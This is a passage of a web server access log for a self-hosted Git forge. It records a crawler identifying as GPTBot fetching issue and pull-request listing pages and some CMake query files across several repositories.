(KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&milestone=-1&sort=mostcomment&state=open&type=all" -[17/Feb/2026:19:20:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&milestone=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10040] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:20:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&milestone=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10015] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&milestone=-1&state=open&type=all" -[17/Feb/2026:19:20:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10004] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?project=-1&sort=latest&state=all&type=all" -[17/Feb/2026:19:20:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10001] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?project=-1&sort=latest&state=all&type=all" -[17/Feb/2026:19:21:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&milestone=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10019] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&milestone=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:19:21:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10050] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&project=-1&sort=oldest&state=open&type=all" -[17/Feb/2026:19:21:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10048] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&project=-1&sort=oldest&state=open&type=all" -[17/Feb/2026:19:21:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10224] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&project=-1&sort=oldest&state=all&type=all" -[17/Feb/2026:19:21:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10052] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=oldest&state=all&type=all" -[17/Feb/2026:19:21:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10060] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&state=closed&type=all" -[17/Feb/2026:19:21:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10028] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:21:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10028] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&sort=oldest&state=closed&type=all" -[17/Feb/2026:19:21:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10209] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&state=open&type=all" -[17/Feb/2026:19:21:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10232] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:21:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10031] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&state=closed&type=all" -[17/Feb/2026:19:21:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/tags.rss" [Client 74.7.227.38] [Length 343] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/tags" -[17/Feb/2026:19:21:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10219] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&sort=latest&state=all&type=all" -[17/Feb/2026:19:21:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10056] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=latest&state=all&type=all" -[17/Feb/2026:19:21:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?milestone=-1&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10040] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?milestone=-1&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:21:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?milestone=-1&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10209] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?milestone=-1&sort=mostcomment&state=closed&type=all" -[17/Feb/2026:19:21:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10058] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&state=closed&type=all" -[17/Feb/2026:19:21:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10231] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:21:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10234] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&sort=mostcomment&state=closed&type=all" -[17/Feb/2026:19:21:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&milestone=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10219] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?milestone=-1&sort=leastupdate&state=open&type=all" -[17/Feb/2026:19:21:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10072] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:21:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10082] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&project=-1&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:21:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10202] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:19:21:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10019] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&state=open&type=all" -[17/Feb/2026:19:21:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10021] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&project=-1&sort=farduedate&state=closed&type=all" -[17/Feb/2026:19:21:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10016] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&state=open&type=all" -[17/Feb/2026:19:21:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?milestone=-1&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10166] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:21:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?milestone=-1&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10166] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:21:14 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/robots.txt" [Client 74.7.175.175] [Length 19] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot" "-" -[17/Feb/2026:19:21:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&milestone=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10191] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&milestone=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:19:21:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&milestone=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10194] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&milestone=-1&state=open&type=all" -[17/Feb/2026:19:21:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&milestone=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10043] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?labels=0&milestone=-1&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:21:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10054] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&project=-1&sort=oldest&state=closed&type=all" -[17/Feb/2026:19:21:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10021] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&project=-1&state=closed&type=all" -[17/Feb/2026:19:21:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&milestone=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10242] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:21:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10056] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&project=-1&state=closed&type=all" -[17/Feb/2026:19:21:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10199] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&project=-1&sort=mostcomment&state=open&type=all" -[17/Feb/2026:19:21:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10240] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&project=-1&state=closed&type=all" -[17/Feb/2026:19:21:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json?display=rendered" [Client 74.7.227.38] [Length 11148] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" -[17/Feb/2026:19:21:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json?display=rendered" [Client 74.7.227.38] [Length 11151] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" -[17/Feb/2026:19:21:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json?display=rendered" [Client 74.7.227.38] [Length 11148] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" -[17/Feb/2026:19:21:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json?display=rendered" [Client 74.7.227.38] [Length 11150] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" -[17/Feb/2026:19:21:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json?display=rendered" [Client 74.7.227.38] [Length 11147] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" -[17/Feb/2026:19:21:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json?display=rendered" [Client 74.7.227.38] [Length 11148] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" -[17/Feb/2026:19:21:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json?display=rendered" [Client 74.7.227.38] [Length 11150] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" -[17/Feb/2026:19:21:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10173] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?project=-1&sort=oldest&state=all&type=all" -[17/Feb/2026:19:21:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10001] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?project=-1&sort=oldest&state=all&type=all" -[17/Feb/2026:19:21:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10005] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?project=-1&sort=oldest&state=all&type=all" -[17/Feb/2026:19:21:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10047] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:21:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10019] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&state=closed&type=all" -[17/Feb/2026:19:21:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10043] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&state=closed&type=all" -[17/Feb/2026:19:21:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10046] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&state=closed&type=all" -[17/Feb/2026:19:21:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10211] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, 